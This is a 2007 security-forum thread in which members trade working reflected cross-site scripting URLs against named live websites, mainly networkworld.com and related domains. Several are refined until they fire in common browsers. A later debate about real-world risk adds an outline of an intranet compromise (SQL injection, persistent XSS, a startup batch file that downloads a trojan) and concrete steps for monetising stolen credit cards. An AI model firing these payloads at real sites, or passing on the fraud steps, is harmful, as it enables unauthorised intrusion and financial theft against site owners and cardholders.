Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Current Page: 1 of 2
Network World
Posted by: id
Date: February 14, 2007 02:14PM

http://www.networkworld.com/community/?q=node/11501

Wonder if they are vulnerable to anything...

They should hold a contest, I'm sure team sla.ckers could win =p

-id

Re: Network World
Posted by: trev
Date: February 14, 2007 04:31PM

Not sure about vulnerabilities yet but I already submitted the function hbxStrip() in http://www.networkworld.com/community/themes/includes/head-minimum.js to thedailywtf.com.

Re: Network World
Posted by: Mephisto
Date: February 14, 2007 04:34PM

So they're (Network World) not concerned with whether or not their website is secure, but they take offense to the "apocalyptic" tone of the press release.

If someone said that 70% of ANYTHING was bad, that IS apocalyptic!

Re: Network World
Posted by: trev
Date: February 14, 2007 04:35PM

Sure enough, this function is vulnerable - it doesn't strip quotation marks. The following works in Internet Explorer:

http://www.networkworld.com/community/?"/style="xss:expression(alert(1))

Re: Network World
Posted by: WhiteAcid
Date: February 14, 2007 04:42PM

That function is just hilarious.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: Network World
Posted by: Mephisto
Date: February 14, 2007 04:42PM

http://networkworld.4jobs.com/JS/Action/Searchresults.asp?q=y&key='--%3E%3Cscript%3Ealert(%22We%20are%20vulnerable%22);%3C/script%3E&SType=1&I1=23



Edited 2 time(s). Last edit at 02/14/2007 04:44PM by Mephisto.

Re: Network World
Posted by: trev
Date: February 14, 2007 05:15PM

Ouch... This hbxStrip() function isn't NetworkWorld's creation, it is WebSideStory code ( http://www.websidestory.com/products/web-analytics/hbx-analytics/overview.html ). That's much bigger than I thought, lots of sites should be vulnerable in the same way. At the very least this exploit works on InfoWorld.com. Anybody have a contact at WebSideStory?



Edited 2 time(s). Last edit at 02/14/2007 05:31PM by trev.

Re: Network World
Posted by: SW
Date: February 14, 2007 05:50PM

That is a pretty neat function. Could be cooler though,

function s(str,i){
if(i==null) i=0;
if(i<str.length) str=s(str,++i);
return str.split("\n.\r.|.&.'.#.&.^.*.:.!.<.>.~.;. ".split('.')).join('');}



Edited 1 time(s). Last edit at 02/14/2007 05:51PM by SW.

Re: Network World
Posted by: trev
Date: February 14, 2007 05:54PM

Click "E-Mail article": http://www.networkworld.com/news/2007/021207-cisco-nokia-convergence.html?'+alert('XSS')+'

Re: Network World
Posted by: SW
Date: February 14, 2007 06:03PM

trev Wrote:
-------------------------------------------------------
> Click "E-Mail article":
> http://www.networkworld.com/news/2007/021207-cisco
> -nokia-convergence.html?'+alert('XSS')+'


This doesn't seem to work in IE7 or FF2.0. :-\

Re: Network World
Posted by: tx
Date: February 14, 2007 06:08PM

Didn't work for me either, fixed it up a bit:

http://www.networkworld.com/news/2007/021207-cisco-nokia-convergence.html?');alert('XSS');"><div%20name=" (click the E-mail Article link)

-tx @ lowtech-labs.org

Re: Network World
Posted by: Kyran
Date: February 14, 2007 06:15PM

I don't want a subscription...
http://www.subscribenw.com/nl/Signup.do?call=eclogin&txtOldEmail=%22%3E%3Cscript%3Ealert('$1000%20plx')%3C/script%3E

- Kyran

Re: Network World
Posted by: Kyran
Date: February 14, 2007 06:19PM

http://www.networkworld.com/resourcelibrary/?type=xss!%3Cscript%3Ealert('$1000%20plx')%3C/script%3E

- Kyran

Re: Network World
Posted by: trev
Date: February 14, 2007 06:25PM

https://www.networkworld.com/reg/reg.do?call=lookup&email=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

@SW: That one works fine in Firefox and IE. You just shouldn't forget the single quotation mark at the end that this forum cuts off. Of course if you only want IE you can simply inject HTML and make the script execute immediately instead of waiting for the user to click the link: http://www.networkworld.com/news/2007/021207-cisco-nokia-convergence.html?"><script>alert("XSS")</script>

Re: Network World
Posted by: Kyran
Date: February 14, 2007 06:31PM

http://www.networkworld.com/salary/2006/level.jsp?level=xss%22%3E%3Cscript%3Ealert('Point%20across%20yet?')%3C/script%3E

- Kyran

Re: Network World
Posted by: rsnake
Date: February 14, 2007 06:36PM

Haha... this one was worth the read:

http://www.matasano.com/log/700/joel-snyder-follows-up-matasano-provides-the-missing-subtext/

- RSnake
Gotta love it. http://ha.ckers.org

Re: Network World
Posted by: xknown
Date: February 14, 2007 06:46PM

http://www.networkworld.com/mailto/mailform.jsp?pagetosend=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E

Re: Network World
Posted by: tx
Date: February 14, 2007 06:58PM

Click on any of Mr. Joel Snyder's wonderful articles

http://search.nwfusion.com/query.html?&col=archive1+1999&ht=0&qp=&qc=&pw=455&ws=0&la=en&si=0&fs=&op0=%2B&fl0=author%3A&ty0=p&tx0=Joel+Snyder&op1=%2B&fl1=&ty1=w&tx1=&op2=-&fl2=&ty2=w&tx2=&qt=&ex=&rq=0&oq=&dt=&inthe=63072000&qm=0&ql=&st=26&nh=25&lk=1&rf=1&qs=");alert('xss');//

Since the forum is gonna mess with that link:
h ttp://search.nwfusion.com/query.html?&col=archive1+1999&ht=0&qp=&qc=&pw=455&ws=0&la=en&si=0&fs=&op0=%2B&fl0=author%3A&ty0=p&tx0=Joel+Snyder&op1=%2B&fl1=&ty1=w&tx1=&op2=-&fl2=&ty2=w&tx2=&qt=&ex=&rq=0&oq=&dt=&inthe=63072000&qm=0&ql=&st=26&nh=25&lk=1&rf=1&qs=");alert('xss');//

-tx @ lowtech-labs.org



Edited 2 time(s). Last edit at 02/14/2007 06:59PM by tx.

Re: Network World
Posted by: trev
Date: February 14, 2007 07:15PM

http://www.networkworld.com/askTheExpert.jsp?pagename=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

Re: Network World
Posted by: trev
Date: February 14, 2007 07:58PM

NetworkWorld is getting boring, something different: http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.opus1.com/htbin/faxpage&URL=http%3A%2F%2Ftest%2F%3C%22%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%3C%22%22%3E&FILE=disk%24ebony%3A%5Bhttpd.o%5Dabout_weather.html&FAX=1234567 [opus1.com]. And I didn't even try to play with the FILE parameter, I am pretty sure it would fax me the source code of all CGI scripts on this site...

Re: Network World
Posted by: jungsonn
Date: February 15, 2007 09:36AM

Sorry to say, but who actually cares if that site has an XSS hole on it? Can you steal my credit card data now? Do you know my bank balance now? I pretty much agree on most things discussed here on the forum about XSS, but it doesn't hit reality.

It poses no risk whatsoever, if anyone can give me an actual risk; please do. And along with that a method of making it cost effective.

I'm not busting balls here, I only try to keep it real.

Re: Network World
Posted by: trev
Date: February 15, 2007 10:09AM

No, I can't steal your credit card data - but I can post comments with your name or take over your blog on NetworkWorld.com if you happen to have one.

Re: Network World
Posted by: rsnake
Date: February 15, 2007 10:56AM

There are dozens of ways to steal credit card data. Yes, your credit card can be stolen through XSS holes (maybe not YOUR credit card number but some credit card numbers). Including the firefox auto-fill feature, the mhtml vuln (assuming your credit card is visible on any site anywhere that you're currently logged into), stealing files from your drive that might contain this sort of data - thanks to Michal Zalewsky, intranet hacking to break into the corporate network etc... etc... You are thinking way too one dimensionally, Jungsonn.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Network World
Posted by: jungsonn
Date: February 15, 2007 11:28AM

Yeah, but where do you enter those credit card numbers? Mostly on a trusted third party server which processes this stuff, not the actual scanned webstore. Are those sites vulnerable then?

What I'm trying to do here is to hack minds; that isn't one dimensional, in fact it's standing outside the security box, looking around the threats, and analysing those threat claims.

And what if they steal 10 credit card numbers?

1. They have to do that from an SSL line (kinda tough).
2. The next thing is to actually gain money from it. How are you going to do that?
3. They have a withdrawal threshold.
4. You have to actually buy stuff with it (easy to get caught).
5. Credit cards have secure PINs etc. etc.
6. And is it profitable to steal 10 card numbers?
7. Credit card processors have spending analysis, giving alerts based on the spending pattern (that's why hackers steal little amounts from thousands of cards).

I think it is way more profitable to skim credit cards at your local restaurant; I think you have to worry more about those guys who actually copy the card (you need physical access to it).

It's all theoretical, has anyone actually tried it out?

Re: Network World
Posted by: jungsonn
Date: February 15, 2007 04:07PM

...and seriously, I'm a little disappointed by all the websec guys that don't see this in its full context. Surely Joel knows what the websec guys talk about; he just plays the advocate of the devil here, to make one think about the real big threats and not single customer/surfer attacks.

Here is my comment on slashdot:

I think I'm almost the only websec guy that agrees with Joel on this one. Hence, I've been talking about it before; Acunetix's claim is false on a practical level. It's only a theoretical one, and it must be considered as such. No man can state 70% is really vulnerable to a compromise, even if I saw all data. Then you have to figure out how to make it profitable to actually do it, and get away with the crime. Ever wondered how Citibank lost all those millions to some Russians? Not through XSS or SQL injection, but actually hacking into their network.

But hear my theory: "I think that 70% of all local banks are at risk of an immediate heist!" Yeah, this could be in theory. Now I only have to do it. And that is the biggest problem.

Another one: "99% of all stores are vulnerable to a stickup!" Yeah, for sure, but can I rob all stores? And how much can I rob before someone grabs me?

The things that have been summed up by the websec guys like:

*portscanning
*cookie stealing
*clipboard reading
*and whatever...

Well, sure this can be done. But is it profitable? Is it doable on a large scale? Do real hackers want to read your clipboard? C'mon, of course they do not. They want 150,000 credit cards. And to obtain those you need to hack into a server, in their network. You cannot do this with a little XSS. Tell me the first person who did this with Cross Site Scripting? Anyone's server being taken down through it?

I guess not.

That is where threat analysis comes into view: how many of those 70% of web sites pose a real threat? Are all those 70% of sites online banks? Then they are right. But my sheer guess is that no bank is listed on their scan list.

Sorry, but this time I do not agree with most websec guys in the real context of threat analysis of the sites they have scanned.

Re: Network World
Posted by: nEUrOO
Date: February 15, 2007 04:32PM

I think you say "vulnerable" for "directly exploitable vulnerability" which, for me at least, may not be the case; it's more general.

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher



Edited 1 time(s). Last edit at 02/15/2007 04:34PM by nEUrOO.

Re: Network World
Posted by: tx
Date: February 15, 2007 04:58PM

@Jungsonn: The issue as I see it is more along the lines of RSnake's Death by 1000 Cuts post http://ha.ckers.org/deathby1000cuts/. The fact of the matter is, aside from things like passthrough() (in case PHP injection is a possibility), there are only limited things one can do with an XSS vulnerability. But the information that can be gained (portscanning, cookie theft, MITM, etc. etc.) can be leveraged quite a bit. Likewise, directory listing, while not a bug in and of itself, can provide valuable information about a server, and can expose more areas for attack. Information that _can_ be used to compromise it. It's all about leveraging what you can get: things like using information gained by exploiting one site to attack another, or the fact that people are lazy and tend to reuse passwords (it may not be best practice but people still do it, even administrators).

-tx @ lowtech-labs.org

Re: Network World
Posted by: Mephisto
Date: February 15, 2007 09:03PM

1) A phishing email using a reflective XSS on a major site could be enough to con a victim into supplying all the information that would be needed. Not to mention any additional information you could gather if you incorporated the mhtml vulnerability.

2) Monetary gain can be made on underground IRC channels, buying and selling credit card info is booming on the black market. The higher the credit limit, the more money that can be made from selling it.

3) Generally credit cards only have PIN numbers when they are used for making cash withdrawals from ATM machines.

4) 10 stolen credit cards with $5000 limits could still make you a couple thousand dollars if you can find a buyer.

5) Using stolen credit cards to purchase items online is relatively simple, assuming you have already stolen someone's identity. Using the stolen identity you could get a P.O. box in the stolen identity's name, then go to amazon.com, purchase a couple $1000's worth of merchandise and have it overnight or 2 day shipped to the P.O. box. Once you have the merchandise you just walk away. It's another 20+ days before the purchase shows up on the victim's billing statement, unless they actively monitor their accounts online.

There are any number of ways these things can happen. Let's not forget the world has evolved from hobbyist hackers breaking into networks because it's a challenge to the hackers of today who are driven by financial gain; they are organized and present a very real threat to everyone.



Edited 1 time(s). Last edit at 02/15/2007 10:20PM by Mephisto.

Re: Network World
Posted by: digi7al64
Date: February 15, 2007 09:40PM

jungsonn Wrote:
-------------------------------------------------------
> Well, sure this can be done. But is it profitable?
> is it doable on a large scale? do real hackers
> want to read your clipboard? C'mon, of coarse they
> do not. They want 150.000 creditcards. And to
> obtain those you need to hack into a server, in
> their network. You cannot do this with a little
> XSS. tell me the first person who did this with
> Cross Site Scripting? Anyone's server being taken
> done through it?
>
> I guess not.


Consider this.
- Using SQL injection I log in to the intranet of the site I am targeting (can only inject to gain access, no other privileges to be found).
- After viewing all the data there I find no real information.
- But I can inject persistent XSS into the news via the admin panel, so I do that.
- The XSS injected is designed to create a batch file in the start up folder which in turn downloads an app to the PC on start up.
- When the computer restarts, it downloads my trojan.

Next
- User logs into intranet and IE warning bar displays.
- User clicks OK to run ActiveX control because it is on the intranet and therefore should be OK.
- Furthermore, I also added some rich content to the screen to make it look legit.
- Batch file is created
- User logs out, turns off computer etc
- User turns on computers
- trojan is downloaded.
- user owned.
- password owned.

... and not only that, I have my trojan within the network. All with some simple SQL and XSS.


EDIT: (@jungsonn) - Just read your blog regarding this subject. And yes, whilst you do make some valid points, remember XSS is more than just a 'pwnt!' alert. What it does is verify (to a certain extent) that user input into the site is essentially unfiltered... and with that said, how many servers have been owned because we could find remote file include vulnerabilities?

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 1 time(s). Last edit at 02/16/2007 12:52AM by digi7al64.

Re: Network World
Posted by: jungsonn
Date: February 16, 2007 07:19AM

I agree with you guys on this one; most things laid out in the above post still stand. Of course it's relatively simple to do this stuff on, let's say, a couple of surfers. A persistent hacker can surely take things down, but to put it into perspective, these things don't happen that much, like I want to believe. Certainly not when some company says that 70% of them are at an "immediate risk", which is just bollocks. Like I said in my article, everyone has an FTP and mail port; these are vulnerable too (in theory). Now how many times are those exploited? Not many.

The thing is, the sites they scanned may contain some webshops. But any reasonable webshop doesn't store credit card data, and does not process it. If they do, they should be banned from the net. You let things like that be handled by third parties. And they have appropriate measures to secure things like that.

And to be really, really honest, I have tried it before. About 2 years ago. Really, no kidding here: try to find someone's credit card info (all of it), exp. date, PINs, the whole range. It's hard.

For personal knowledge I managed to get hold of someone's credit card information, but I destroyed it after that. I only wanted to know how easy it could be (from a researcher's standpoint, which sometimes includes actual hacking). And FYI it took me about 1 month to launch such a thing with a web attack/social engineering point only.

So, it is far more profitable to actually hack into a network of some credit card processor, and download the whole database.

I don't want to kick nuts here, I'm only trying to put the risks into real perspective. I know it won't give me a good name while I'm at it, but I think it can be another angle to be honest on this one.
